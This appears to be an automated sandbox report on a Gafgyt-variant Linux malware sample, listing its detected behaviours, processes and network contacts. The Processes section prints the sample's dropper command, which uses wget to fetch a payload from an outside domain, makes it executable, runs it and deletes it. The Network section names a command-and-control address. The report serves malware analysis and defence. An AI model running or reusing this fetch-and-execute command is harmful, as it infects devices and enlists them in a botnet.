Analysis Overview
SHA256
e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d
Threat Level: Known bad
The file e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf was found to be: Known bad.
Malicious Activity Summary
Gafgyt family
Detected Gafgyt variant
Changes its process name
Executes dropped EXE
Modifies Watchdog functionality
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 01:26
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 01:26
Reported
2024-04-02 01:29
Platform
debian9-mipsbe-20240226-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /dev/watchdog | N/A | N/A |
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/net/route | /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/net/route | /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf
[/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| MD | 85.239.33.129:666 | | tcp |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |